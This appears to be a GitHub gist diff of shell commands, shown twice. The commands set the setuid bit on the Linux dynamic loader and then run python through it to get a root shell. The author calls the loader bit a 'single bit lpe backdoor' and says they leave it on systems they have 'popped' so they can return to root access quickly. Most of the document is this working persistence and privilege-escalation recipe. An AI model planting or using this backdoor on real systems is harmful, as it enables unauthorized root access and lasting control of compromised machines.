emptymonkey · May 10, 2018 00:10
diff --git a/gistfile1.txt b/gistfile1.txt

 # First, let's demonstrate that read implies execute.
 cp /usr/bin/id .
 ls -l ./id
 ./id
 chmod a-x ./id
 ls -l id
 readelf -l ./id  | grep "program interpreter"
 ls -l /lib64/ld-linux-x86-64.so.2
 ls -l /lib/x86_64-linux-gnu/ld-2.23.so
 /lib/x86_64-linux-gnu/ld-2.23.so ./id

 # Now what happens if we flip suid bit on the loader?
 sudo chmod u+s /lib/x86_64-linux-gnu/ld-2.23.so
 ls -l /lib/x86_64-linux-gnu/ld-2.23.so
 /lib/x86_64-linux-gnu/ld-2.23.so ./id

 # Ok, so our euid is now root. Let's upgrade...
 chmod a+x ./id
 ls -l ./id
 /lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("./id")'

 # The suid bit on the loader is basically a single bit lpe backdoor.
 # I use this on systems I've popped so the lpe phase when I return is super quick...
 /lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("/bin/bash")'

	# First, let's demonstrate that read implies execute.
	cp /usr/bin/id .
	ls -l ./id
	./id
	chmod a-x ./id
	ls -l id
	readelf -l ./id \| grep "program interpreter"
	ls -l /lib64/ld-linux-x86-64.so.2
	ls -l /lib/x86_64-linux-gnu/ld-2.23.so
	/lib/x86_64-linux-gnu/ld-2.23.so ./id

	# Now what happens if we flip suid bit on the loader?
	sudo chmod u+s /lib/x86_64-linux-gnu/ld-2.23.so
	ls -l /lib/x86_64-linux-gnu/ld-2.23.so
	/lib/x86_64-linux-gnu/ld-2.23.so ./id

	# Ok, so our euid is now root. Let's upgrade...
	chmod a+x ./id
	ls -l ./id
	/lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("./id")'

	# The suid bit on the loader is basically a single bit lpe backdoor.
	# I use this on systems I've popped so the lpe phase when I return is super quick...
	/lib/x86_64-linux-gnu/ld-2.23.so /usr/bin/python -c 'import os; os.setuid(os.geteuid()); os.setgid(os.geteuid()); os.system("/bin/bash")'